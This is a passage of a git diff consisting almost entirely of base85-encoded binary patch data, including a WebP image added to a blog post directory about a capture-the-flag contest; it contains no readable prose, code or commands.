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 diff --git a/content/blog/ctfcup2024-olymp/compare_memcmp.webp b/content/blog/ctfcup2024-olymp/compare_memcmp.webp new file mode 100644 index 0000000000000000000000000000000000000000..3b10684da040aeea0cbe25d8a52bccad5cfd065b GIT binary patch literal 13804 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 